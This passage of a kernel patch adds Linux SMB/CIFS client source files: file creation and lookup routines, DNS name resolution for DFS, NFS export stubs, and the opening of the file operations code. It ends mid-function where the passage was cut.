++			 * supported, despite what the server claimed in capability
++			 * negotiation.
++			 *
++			 * POSIX open in samba versions 3.3.1 and earlier could
++			 * incorrectly fail with invalid parameter.
++			 */
++			tcon->broken_posix_open = true;
++			break;
++
++		case -EREMOTE:
++		case -EOPNOTSUPP:
++			/*
++			 * EREMOTE indicates DFS junction, which is not handled
++			 * in posix open.  If either that or op not supported
++			 * returned, follow the normal lookup.
++			 */
++			break;
++
++		default:
++			goto out;
++		}
++		/*
++		 * Fall through to retry using the older open call; this is the
++		 * case where the server does not support this SMB level and
++		 * falsely claims the capability (we also get here for the DFS
++		 * case, which should be rare for paths not covered on files).
++		 */
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	desired_access = 0;
++	if (OPEN_FMODE(oflags) & FMODE_READ)
++		desired_access |= GENERIC_READ; /* is this too little? */
++	if (OPEN_FMODE(oflags) & FMODE_WRITE)
++		desired_access |= GENERIC_WRITE;
++
++	disposition = FILE_OVERWRITE_IF;
++	if ((oflags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
++		disposition = FILE_CREATE;
++	else if ((oflags & (O_CREAT | O_TRUNC)) == (O_CREAT | O_TRUNC))
++		disposition = FILE_OVERWRITE_IF;
++	else if ((oflags & O_CREAT) == O_CREAT)
++		disposition = FILE_OPEN_IF;
++	else
++		cifs_dbg(FYI, "Create flag not set in create function\n");
++
++	/*
++	 * BB add processing to set equivalent of mode - e.g. via CreateX with
++	 * ACLs
++	 */
++
++	if (!server->ops->open) {
++		rc = -ENOSYS;
++		goto out;
++	}
++
++	/*
++	 * if we're not using unix extensions, see if we need to set
++	 * ATTR_READONLY on the create call
++	 */
++	if (!tcon->unix_ext && (mode & S_IWUGO) == 0)
++		create_options |= CREATE_OPTION_READONLY;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++		.mode = mode,
++	};
++	rc = server->ops->open(xid, &oparms, oplock, buf);
++	if (rc) {
++		cifs_dbg(FYI, "cifs_create returned 0x%x\n", rc);
++		goto out;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	/*
++	 * If Open reported that we actually created a file then we now have to
++	 * set the mode if possible.
++	 */
++	if ((tcon->unix_ext) && (*oplock & CIFS_CREATE_ACTION)) {
++		struct cifs_unix_set_info_args args = {
++				.mode	= mode,
++				.ctime	= NO_CHANGE_64,
++				.atime	= NO_CHANGE_64,
++				.mtime	= NO_CHANGE_64,
++				.device	= 0,
++		};
++
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
++			args.uid = current_fsuid();
++			if (inode->i_mode & S_ISGID)
++				args.gid = inode->i_gid;
++			else
++				args.gid = current_fsgid();
++		} else {
++			args.uid = INVALID_UID; /* no change */
++			args.gid = INVALID_GID; /* no change */
++		}
++		CIFSSMBUnixSetFileInfo(xid, tcon, &args, fid->netfid,
++				       current->tgid);
++	} else {
++		/*
++		 * BB implement mode setting via Windows security
++		 * descriptors e.g.
++		 */
++		/* CIFSSMBWinSetPerms(xid,tcon,path,mode,-1,-1,nls);*/
++
++		/* Could set r/o dos attribute if mode & 0222 == 0 */
++	}
++
++cifs_create_get_file_info:
++	/* server might mask mode so we have to query for it */
++	if (tcon->unix_ext)
++		rc = cifs_get_inode_info_unix(&newinode, full_path, inode->i_sb,
++					      xid);
++	else {
++#else
++	{
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		/* TODO: Add support for calling POSIX query info here, but passing in fid */
++		rc = cifs_get_inode_info(&newinode, full_path, buf, inode->i_sb, xid, fid);
++		if (newinode) {
++			if (server->ops->set_lease_key)
++				server->ops->set_lease_key(newinode, fid);
++			if ((*oplock & CIFS_CREATE_ACTION) && S_ISREG(newinode->i_mode)) {
++				if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
++					newinode->i_mode = mode;
++				if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
++					newinode->i_uid = current_fsuid();
++					if (inode->i_mode & S_ISGID)
++						newinode->i_gid = inode->i_gid;
++					else
++						newinode->i_gid = current_fsgid();
++				}
++			}
++		}
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++cifs_create_set_dentry:
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	if (rc != 0) {
++		cifs_dbg(FYI, "Create worked, get_inode_info failed rc = %d\n",
++			 rc);
++		goto out_err;
++	}
++
++	if (newinode)
++		if (S_ISDIR(newinode->i_mode)) {
++			rc = -EISDIR;
++			goto out_err;
++		}
++
++	d_drop(direntry);
++	d_add(direntry, newinode);
++
++out:
++	free_dentry_path(page);
++	return rc;
++
++out_err:
++	if (server->ops->close)
++		server->ops->close(xid, tcon, fid);
++	if (newinode)
++		iput(newinode);
++	goto out;
++}
++
++int
++cifs_atomic_open(struct inode *inode, struct dentry *direntry,
++		 struct file *file, unsigned oflags, umode_t mode)
++{
++	int rc;
++	unsigned int xid;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifs_fid fid = {};
++	struct cifs_pending_open open;
++	__u32 oplock;
++	struct cifsFileInfo *file_info;
++	struct cifs_open_info_data buf = {};
++
++	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb))))
++		return -EIO;
++
++	/*
++	 * Posix open is only called (at lookup time) for file create now. For
++	 * opens (rather than creates), because we do not know if it is a file
++	 * or directory yet, and current Samba no longer allows us to do posix
++	 * open on dirs, we could end up wasting an open call on what turns out
++	 * to be a dir. For file opens, we wait to call posix open till
++	 * cifs_open.  It could be added to atomic_open in the future but the
++	 * performance tradeoff of the extra network request when EISDIR or
++	 * EACCES is returned would have to be weighed against the 50% reduction
++	 * in network traffic in the other paths.
++	 */
++	if (!(oflags & O_CREAT)) {
++		struct dentry *res;
++
++		/*
++		 * Check for hashed negative dentry. We have already revalidated
++		 * the dentry and it is fine. No need to perform another lookup.
++		 */
++		if (!d_in_lookup(direntry))
++			return -ENOENT;
++
++		res = cifs_lookup(inode, direntry, 0);
++		if (IS_ERR(res))
++			return PTR_ERR(res);
++
++		return finish_no_open(file, res);
++	}
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
++		 inode, direntry, direntry);
++
++	tlink = cifs_sb_tlink(CIFS_SB(inode->i_sb));
++	if (IS_ERR(tlink)) {
++		rc = PTR_ERR(tlink);
++		goto out_free_xid;
++	}
++
++	tcon = tlink_tcon(tlink);
++
++	rc = check_name(direntry, tcon);
++	if (rc)
++		goto out;
++
++	server = tcon->ses->server;
++
++	if (server->ops->new_lease_key)
++		server->ops->new_lease_key(&fid);
++
++	cifs_add_pending_open(&fid, tlink, &open);
++
++	rc = cifs_do_create(inode, direntry, xid, tlink, oflags, mode,
++			    &oplock, &fid, &buf);
++	if (rc) {
++		cifs_del_pending_open(&open);
++		goto out;
++	}
++
++	if ((oflags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
++		file->f_mode |= FMODE_CREATED;
++
++	rc = finish_open(file, direntry, generic_file_open);
++	if (rc) {
++		if (server->ops->close)
++			server->ops->close(xid, tcon, &fid);
++		cifs_del_pending_open(&open);
++		goto out;
++	}
++
++	if (file->f_flags & O_DIRECT &&
++	    CIFS_SB(inode->i_sb)->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
++		if (CIFS_SB(inode->i_sb)->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++			file->f_op = &cifs_file_direct_nobrl_ops;
++		else
++			file->f_op = &cifs_file_direct_ops;
++	}
++
++	file_info = cifs_new_fileinfo(&fid, file, tlink, oplock, buf.symlink_target);
++	if (file_info == NULL) {
++		if (server->ops->close)
++			server->ops->close(xid, tcon, &fid);
++		cifs_del_pending_open(&open);
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	fscache_use_cookie(cifs_inode_cookie(file_inode(file)),
++			   file->f_mode & FMODE_WRITE);
++
++out:
++	cifs_put_tlink(tlink);
++out_free_xid:
++	free_xid(xid);
++	cifs_free_open_info(&buf);
++	return rc;
++}
++
++int cifs_create(struct user_namespace *mnt_userns, struct inode *inode,
++		struct dentry *direntry, umode_t mode, bool excl)
++{
++	int rc;
++	unsigned int xid = get_xid();
++	/*
++	 * BB below access is probably too much for mknod to request
++	 *    but we have to do query and setpathinfo so requesting
++	 *    less could fail (unless we want to request getatr and setatr
++	 *    permissions only).  At least for POSIX we do not have to
++	 *    request so much.
++	 */
++	unsigned oflags = O_EXCL | O_CREAT | O_RDWR;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct cifs_fid fid;
++	__u32 oplock;
++	struct cifs_open_info_data buf = {};
++
++	cifs_dbg(FYI, "cifs_create parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
++		 inode, direntry, direntry);
++
++	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb)))) {
++		rc = -EIO;
++		goto out_free_xid;
++	}
++
++	tlink = cifs_sb_tlink(CIFS_SB(inode->i_sb));
++	rc = PTR_ERR(tlink);
++	if (IS_ERR(tlink))
++		goto out_free_xid;
++
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	if (server->ops->new_lease_key)
++		server->ops->new_lease_key(&fid);
++
++	rc = cifs_do_create(inode, direntry, xid, tlink, oflags, mode, &oplock, &fid, &buf);
++	if (!rc && server->ops->close)
++		server->ops->close(xid, tcon, &fid);
++
++	cifs_free_open_info(&buf);
++	cifs_put_tlink(tlink);
++out_free_xid:
++	free_xid(xid);
++	return rc;
++}
++
++int cifs_mknod(struct user_namespace *mnt_userns, struct inode *inode,
++	       struct dentry *direntry, umode_t mode, dev_t device_number)
++{
++	int rc = -EPERM;
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	const char *full_path;
++	void *page;
++
++	if (!old_valid_dev(device_number))
++		return -EINVAL;
++
++	cifs_sb = CIFS_SB(inode->i_sb);
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++
++	page = alloc_dentry_path();
++	tcon = tlink_tcon(tlink);
++	xid = get_xid();
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto mknod_out;
++	}
++
++	rc = tcon->ses->server->ops->make_node(xid, inode, direntry, tcon,
++					       full_path, mode,
++					       device_number);
++
++mknod_out:
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++struct dentry *
++cifs_lookup(struct inode *parent_dir_inode, struct dentry *direntry,
++	    unsigned int flags)
++{
++	unsigned int xid;
++	int rc = 0; /* to get around spurious gcc warning, set to zero here */
++	struct cifs_sb_info *cifs_sb;
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	struct inode *newInode = NULL;
++	const char *full_path;
++	void *page;
++	int retry_count = 0;
++
++	xid = get_xid();
++
++	cifs_dbg(FYI, "parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
++		 parent_dir_inode, direntry, direntry);
++
++	/* check whether path exists */
++
++	cifs_sb = CIFS_SB(parent_dir_inode->i_sb);
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		free_xid(xid);
++		return ERR_CAST(tlink);
++	}
++	pTcon = tlink_tcon(tlink);
++
++	rc = check_name(direntry, pTcon);
++	if (unlikely(rc)) {
++		cifs_put_tlink(tlink);
++		free_xid(xid);
++		return ERR_PTR(rc);
++	}
++
++	/*
++	 * We cannot grab the rename sem here since it would deadlock in the
++	 * cases (beginning of sys_rename itself) in which we already have
++	 * the sb rename sem.
++	 */
++	page = alloc_dentry_path();
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		cifs_put_tlink(tlink);
++		free_xid(xid);
++		free_dentry_path(page);
++		return ERR_CAST(full_path);
++	}
++
++	if (d_really_is_positive(direntry)) {
++		cifs_dbg(FYI, "non-NULL inode in lookup\n");
++	} else {
++		cifs_dbg(FYI, "NULL inode in lookup\n");
++	}
++	cifs_dbg(FYI, "Full path: %s inode = 0x%p\n",
++		 full_path, d_inode(direntry));
++
++again:
++	if (pTcon->posix_extensions)
++		rc = smb311_posix_get_inode_info(&newInode, full_path, parent_dir_inode->i_sb, xid);
++	else if (pTcon->unix_ext) {
++		rc = cifs_get_inode_info_unix(&newInode, full_path,
++					      parent_dir_inode->i_sb, xid);
++	} else {
++		rc = cifs_get_inode_info(&newInode, full_path, NULL,
++				parent_dir_inode->i_sb, xid, NULL);
++	}
++
++	if (rc == 0) {
++		/* since paths are not looked up by component - the parent
++		   directories are presumed to be good here */
++		renew_parental_timestamps(direntry);
++	} else if (rc == -EAGAIN && retry_count++ < 10) {
++		goto again;
++	} else if (rc == -ENOENT) {
++		cifs_set_time(direntry, jiffies);
++		newInode = NULL;
++	} else {
++		if (rc != -EACCES) {
++			cifs_dbg(FYI, "Unexpected lookup error %d\n", rc);
++			/* We special case check for Access Denied - since that
++			is a common return code */
++		}
++		newInode = ERR_PTR(rc);
++	}
++	free_dentry_path(page);
++	cifs_put_tlink(tlink);
++	free_xid(xid);
++	return d_splice_alias(newInode, direntry);
++}
++
++static int
++cifs_d_revalidate(struct dentry *direntry, unsigned int flags)
++{
++	struct inode *inode;
++	int rc;
++
++	if (flags & LOOKUP_RCU)
++		return -ECHILD;
++
++	if (d_really_is_positive(direntry)) {
++		inode = d_inode(direntry);
++		if ((flags & LOOKUP_REVAL) && !CIFS_CACHE_READ(CIFS_I(inode)))
++			CIFS_I(inode)->time = 0; /* force reval */
++
++		rc = cifs_revalidate_dentry(direntry);
++		if (rc) {
++			cifs_dbg(FYI, "cifs_revalidate_dentry failed with rc=%d", rc);
++			switch (rc) {
++			case -ENOENT:
++			case -ESTALE:
++				/*
++				 * Those errors mean the dentry is invalid
++				 * (file was deleted or recreated)
++				 */
++				return 0;
++			default:
++				/*
++				 * Otherwise some unexpected error happened
++				 * report it as-is to VFS layer
++				 */
++				return rc;
++			}
++		} else {
++			/*
++			 * If the inode wasn't known to be a dfs entry when
++			 * the dentry was instantiated, such as when created
++			 * via ->readdir(), it needs to be set now since the
++			 * attributes will have been updated by
++			 * cifs_revalidate_dentry().
++			 */
++			if (IS_AUTOMOUNT(inode) &&
++			   !(direntry->d_flags & DCACHE_NEED_AUTOMOUNT)) {
++				spin_lock(&direntry->d_lock);
++				direntry->d_flags |= DCACHE_NEED_AUTOMOUNT;
++				spin_unlock(&direntry->d_lock);
++			}
++
++			return 1;
++		}
++	}
++
++	/*
++	 * This may be nfsd (or something), anyway, we can't see the
++	 * intent of this. So, since this can be for creation, drop it.
++	 */
++	if (!flags)
++		return 0;
++
++	/*
++	 * Drop the negative dentry, in order to make sure to use the
++	 * case sensitive name which is specified by user if this is
++	 * for creation.
++	 */
++	if (flags & (LOOKUP_CREATE | LOOKUP_RENAME_TARGET))
++		return 0;
++
++	if (time_after(jiffies, cifs_get_time(direntry) + HZ) || !lookupCacheEnabled)
++		return 0;
++
++	return 1;
++}
++
++/* static int cifs_d_delete(struct dentry *direntry)
++{
++	int rc = 0;
++
++	cifs_dbg(FYI, "In cifs d_delete, name = %pd\n", direntry);
++
++	return rc;
++}     */
++
++const struct dentry_operations cifs_dentry_ops = {
++	.d_revalidate = cifs_d_revalidate,
++	.d_automount = cifs_dfs_d_automount,
++/* d_delete:       cifs_d_delete,      */ /* not needed except for debugging */
++};
++
++static int cifs_ci_hash(const struct dentry *dentry, struct qstr *q)
++{
++	struct nls_table *codepage = CIFS_SB(dentry->d_sb)->local_nls;
++	unsigned long hash;
++	wchar_t c;
++	int i, charlen;
++
++	hash = init_name_hash(dentry);
++	for (i = 0; i < q->len; i += charlen) {
++		charlen = codepage->char2uni(&q->name[i], q->len - i, &c);
++		/* error out if we can't convert the character */
++		if (unlikely(charlen < 0))
++			return charlen;
++		hash = partial_name_hash(cifs_toupper(c), hash);
++	}
++	q->hash = end_name_hash(hash);
++
++	return 0;
++}
++
++static int cifs_ci_compare(const struct dentry *dentry,
++		unsigned int len, const char *str, const struct qstr *name)
++{
++	struct nls_table *codepage = CIFS_SB(dentry->d_sb)->local_nls;
++	wchar_t c1, c2;
++	int i, l1, l2;
++
++	/*
++	 * We make the assumption here that uppercase characters in the local
++	 * codepage are always the same length as their lowercase counterparts.
++	 *
++	 * If that's ever not the case, then this will fail to match it.
++	 */
++	if (name->len != len)
++		return 1;
++
++	for (i = 0; i < len; i += l1) {
++		/* Convert characters in both strings to UTF-16. */
++		l1 = codepage->char2uni(&str[i], len - i, &c1);
++		l2 = codepage->char2uni(&name->name[i], name->len - i, &c2);
++
++		/*
++		 * If we can't convert either character, just declare it to
++		 * be 1 byte long and compare the original byte.
++		 */
++		if (unlikely(l1 < 0 && l2 < 0)) {
++			if (str[i] != name->name[i])
++				return 1;
++			l1 = 1;
++			continue;
++		}
++
++		/*
++		 * Here, we again ass|u|me that upper/lowercase versions of
++		 * a character are the same length in the local NLS.
++		 */
++		if (l1 != l2)
++			return 1;
++
++		/* Now compare uppercase versions of these characters */
++		if (cifs_toupper(c1) != cifs_toupper(c2))
++			return 1;
++	}
++
++	return 0;
++}
++
++const struct dentry_operations cifs_ci_dentry_ops = {
++	.d_revalidate = cifs_d_revalidate,
++	.d_hash = cifs_ci_hash,
++	.d_compare = cifs_ci_compare,
++	.d_automount = cifs_dfs_d_automount,
++};
+diff --git a/fs/smb/client/dns_resolve.c b/fs/smb/client/dns_resolve.c
+new file mode 100644
+index 0000000000000..0458d28d71aa6
+--- /dev/null
++++ b/fs/smb/client/dns_resolve.c
+@@ -0,0 +1,89 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (c) 2007 Igor Mammedov
++ *   Author(s): Igor Mammedov (niallain@gmail.com)
++ *              Steve French (sfrench@us.ibm.com)
++ *              Wang Lei (wang840925@gmail.com)
++ *		David Howells (dhowells@redhat.com)
++ *
++ *   Contains the CIFS DFS upcall routines used for hostname to
++ *   IP address translation.
++ *
++ */
++
++#include <linux/slab.h>
++#include <linux/dns_resolver.h>
++#include "dns_resolve.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++
++/**
++ * dns_resolve_server_name_to_ip - Resolve UNC server name to ip address.
++ * @unc: UNC path specifying the server (with '/' as delimiter)
++ * @ip_addr: Where to return the IP address.
++ * @expiry: Where to return the expiry time for the dns record.
++ *
++ * The IP address will be returned in string form, and the caller is
++ * responsible for freeing it.
++ *
++ * Returns length of result on success, -ve on error.
++ */
++int
++dns_resolve_server_name_to_ip(const char *unc, char **ip_addr, time64_t *expiry)
++{
++	struct sockaddr_storage ss;
++	const char *hostname, *sep;
++	char *name;
++	int len, rc;
++
++	if (!ip_addr || !unc)
++		return -EINVAL;
++
++	len = strlen(unc);
++	if (len < 3) {
++		cifs_dbg(FYI, "%s: unc is too short: %s\n", __func__, unc);
++		return -EINVAL;
++	}
++
++	/* Discount leading slashes for cifs */
++	len -= 2;
++	hostname = unc + 2;
++
++	/* Search for server name delimiter */
++	sep = memchr(hostname, '/', len);
++	if (sep)
++		len = sep - hostname;
++	else
++		cifs_dbg(FYI, "%s: probably server name is whole unc: %s\n",
++			 __func__, unc);
++
++	/* Try to interpret hostname as an IPv4 or IPv6 address */
++	rc = cifs_convert_address((struct sockaddr *)&ss, hostname, len);
++	if (rc > 0)
++		goto name_is_IP_address;
++
++	/* Perform the upcall */
++	rc = dns_query(current->nsproxy->net_ns, NULL, hostname, len,
++		       NULL, ip_addr, expiry, false);
++	if (rc < 0)
++		cifs_dbg(FYI, "%s: unable to resolve: %*.*s\n",
++			 __func__, len, len, hostname);
++	else
++		cifs_dbg(FYI, "%s: resolved: %*.*s to %s expiry %llu\n",
++			 __func__, len, len, hostname, *ip_addr,
++			 expiry ? (*expiry) : 0);
++	return rc;
++
++name_is_IP_address:
++	name = kmalloc(len + 1, GFP_KERNEL);
++	if (!name)
++		return -ENOMEM;
++	memcpy(name, hostname, len);
++	name[len] = 0;
++	cifs_dbg(FYI, "%s: unc is IP, skipping dns upcall: %s\n",
++		 __func__, name);
++	*ip_addr = name;
++	return 0;
++}
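++
++/*
++ * Illustrative call (hypothetical values): for unc "//fileserver/share",
++ * a successful upcall might set *ip_addr to a string such as
++ * "192.168.0.2", which the caller must then kfree().
++ */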
+diff --git a/fs/smb/client/dns_resolve.h b/fs/smb/client/dns_resolve.h
+new file mode 100644
+index 0000000000000..afc0df381246b
+--- /dev/null
++++ b/fs/smb/client/dns_resolve.h
+@@ -0,0 +1,18 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *   DNS Resolver upcall management for CIFS DFS
++ *   Handles host name to IP address resolution
++ *
++ *   Copyright (c) International Business Machines  Corp., 2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#ifndef _DNS_RESOLVE_H
++#define _DNS_RESOLVE_H
++
++#ifdef __KERNEL__
++extern int dns_resolve_server_name_to_ip(const char *unc, char **ip_addr, time64_t *expiry);
++#endif /* KERNEL */
++
++#endif /* _DNS_RESOLVE_H */
+diff --git a/fs/smb/client/export.c b/fs/smb/client/export.c
+new file mode 100644
+index 0000000000000..37c28415df1e0
+--- /dev/null
++++ b/fs/smb/client/export.c
+@@ -0,0 +1,54 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   Common Internet FileSystem (CIFS) client
++ *
++ *   Operations related to support for exporting files via NFSD
++ *
++ */
++
++ /*
++  * See Documentation/filesystems/nfs/exporting.rst
++  * and examples in fs/exportfs
++  *
++  * Since cifs is a network file system, an "fsid" must be included for
++  * any nfs exports file entries which refer to cifs paths.  In addition
++  * the cifs mount must be mounted with the "serverino" option (ie use stable
++  * server inode numbers instead of locally generated temporary ones).
++  * Although cifs inodes do not use generation numbers (have generation number
++  * of zero) - the inode number alone should be good enough for simple cases
++  * in which users want to export cifs shares with NFS. The decode and encode
++  * could be improved by using a new routine which expects 64 bit inode numbers
++  * instead of the default 32 bit routines in fs/exportfs
++  *
++  */
++
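++/*
++ * An exports(5) entry for a path on such a mount might therefore look
++ * like (illustrative values):
++ *
++ *	/mnt/cifs  *(rw,fsid=412)
++ *
++ * with the underlying cifs mount done with -o serverino.
++ */
++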
++#include <linux/fs.h>
++#include <linux/exportfs.h>
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifsfs.h"
++
++#ifdef CONFIG_CIFS_NFSD_EXPORT
++static struct dentry *cifs_get_parent(struct dentry *dentry)
++{
++	/* BB need to add code here eventually to enable export via NFSD */
++	cifs_dbg(FYI, "get parent for %p\n", dentry);
++	return ERR_PTR(-EACCES);
++}
++
++const struct export_operations cifs_export_ops = {
++	.get_parent = cifs_get_parent,
++/*	Following five export operations are unneeded so far and can default:
++	.get_dentry =
++	.get_name =
++	.find_exported_dentry =
++	.decode_fh =
++	.encode_fh =  */
++};
++
++#endif /* CONFIG_CIFS_NFSD_EXPORT */
++
+diff --git a/fs/smb/client/file.c b/fs/smb/client/file.c
+new file mode 100644
+index 0000000000000..87dcffece7623
+--- /dev/null
++++ b/fs/smb/client/file.c
+@@ -0,0 +1,5290 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   vfs operations that deal with files
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2010
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Jeremy Allison (jra@samba.org)
++ *
++ */
++#include <linux/fs.h>
++#include <linux/backing-dev.h>
++#include <linux/stat.h>
++#include <linux/fcntl.h>
++#include <linux/pagemap.h>
++#include <linux/pagevec.h>
++#include <linux/writeback.h>
++#include <linux/task_io_accounting_ops.h>
++#include <linux/delay.h>
++#include <linux/mount.h>
++#include <linux/slab.h>
++#include <linux/swap.h>
++#include <linux/mm.h>
++#include <asm/div64.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "fscache.h"
++#include "smbdirect.h"
++#include "fs_context.h"
++#include "cifs_ioctl.h"
++#include "cached_dir.h"
++
++/*
++ * Mark as invalid, all open files on tree connections since they
++ * were closed when session to server was lost.
++ */
++void
++cifs_mark_open_files_invalid(struct cifs_tcon *tcon)
++{
++	struct cifsFileInfo *open_file = NULL;
++	struct list_head *tmp;
++	struct list_head *tmp1;
++
++	/* only send once per connect */
++	spin_lock(&tcon->ses->ses_lock);
++	if ((tcon->ses->ses_status != SES_GOOD) || (tcon->status != TID_NEED_RECON)) {
++		spin_unlock(&tcon->ses->ses_lock);
++		return;
++	}
++	tcon->status = TID_IN_FILES_INVALIDATE;
++	spin_unlock(&tcon->ses->ses_lock);
++
++	/* list all files open on tree connection and mark them invalid */
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_safe(tmp, tmp1, &tcon->openFileList) {
++		open_file = list_entry(tmp, struct cifsFileInfo, tlist);
++		open_file->invalidHandle = true;
++		open_file->oplock_break_cancelled = true;
++	}
++	spin_unlock(&tcon->open_file_lock);
++
++	invalidate_all_cached_dirs(tcon);
++	spin_lock(&tcon->tc_lock);
++	if (tcon->status == TID_IN_FILES_INVALIDATE)
++		tcon->status = TID_NEED_TCON;
++	spin_unlock(&tcon->tc_lock);
++
++	/*
++	 * BB Add call to invalidate_inodes(sb) for all superblocks mounted
++	 * to this tcon.
++	 */
++}
++
++static inline int cifs_convert_flags(unsigned int flags)
++{
++	if ((flags & O_ACCMODE) == O_RDONLY)
++		return GENERIC_READ;
++	else if ((flags & O_ACCMODE) == O_WRONLY)
++		return GENERIC_WRITE;
++	else if ((flags & O_ACCMODE) == O_RDWR) {
++		/* GENERIC_ALL is too much permission to request; it
++		   can cause unnecessary access denied on create */
++		/* return GENERIC_ALL; */
++		return (GENERIC_READ | GENERIC_WRITE);
++	}
++
++	return (READ_CONTROL | FILE_WRITE_ATTRIBUTES | FILE_READ_ATTRIBUTES |
++		FILE_WRITE_EA | FILE_APPEND_DATA | FILE_WRITE_DATA |
++		FILE_READ_DATA);
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static u32 cifs_posix_convert_flags(unsigned int flags)
++{
++	u32 posix_flags = 0;
++
++	if ((flags & O_ACCMODE) == O_RDONLY)
++		posix_flags = SMB_O_RDONLY;
++	else if ((flags & O_ACCMODE) == O_WRONLY)
++		posix_flags = SMB_O_WRONLY;
++	else if ((flags & O_ACCMODE) == O_RDWR)
++		posix_flags = SMB_O_RDWR;
++
++	if (flags & O_CREAT) {
++		posix_flags |= SMB_O_CREAT;
++		if (flags & O_EXCL)
++			posix_flags |= SMB_O_EXCL;
++	} else if (flags & O_EXCL)
++		cifs_dbg(FYI, "Application %s pid %d has incorrectly set O_EXCL flag but not O_CREAT on file open. Ignoring O_EXCL\n",
++			 current->comm, current->tgid);
++
++	if (flags & O_TRUNC)
++		posix_flags |= SMB_O_TRUNC;
++	/* be safe and imply O_SYNC for O_DSYNC */
++	if (flags & O_DSYNC)
++		posix_flags |= SMB_O_SYNC;
++	if (flags & O_DIRECTORY)
++		posix_flags |= SMB_O_DIRECTORY;
++	if (flags & O_NOFOLLOW)
++		posix_flags |= SMB_O_NOFOLLOW;
++	if (flags & O_DIRECT)
++		posix_flags |= SMB_O_DIRECT;
++
++	return posix_flags;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static inline int cifs_get_disposition(unsigned int flags)
++{
++	if ((flags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
++		return FILE_CREATE;
++	else if ((flags & (O_CREAT | O_TRUNC)) == (O_CREAT | O_TRUNC))
++		return FILE_OVERWRITE_IF;
++	else if ((flags & O_CREAT) == O_CREAT)
++		return FILE_OPEN_IF;
++	else if ((flags & O_TRUNC) == O_TRUNC)
++		return FILE_OVERWRITE;
++	else
++		return FILE_OPEN;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++int cifs_posix_open(const char *full_path, struct inode **pinode,
++			struct super_block *sb, int mode, unsigned int f_flags,
++			__u32 *poplock, __u16 *pnetfid, unsigned int xid)
++{
++	int rc;
++	FILE_UNIX_BASIC_INFO *presp_data;
++	__u32 posix_flags = 0;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_fattr fattr;
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++
++	cifs_dbg(FYI, "posix open %s\n", full_path);
++
++	presp_data = kzalloc(sizeof(FILE_UNIX_BASIC_INFO), GFP_KERNEL);
++	if (presp_data == NULL)
++		return -ENOMEM;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		rc = PTR_ERR(tlink);
++		goto posix_open_ret;
++	}
++
++	tcon = tlink_tcon(tlink);
++	mode &= ~current_umask();
++
++	posix_flags = cifs_posix_convert_flags(f_flags);
++	rc = CIFSPOSIXCreate(xid, tcon, posix_flags, mode, pnetfid, presp_data,
++			     poplock, full_path, cifs_sb->local_nls,
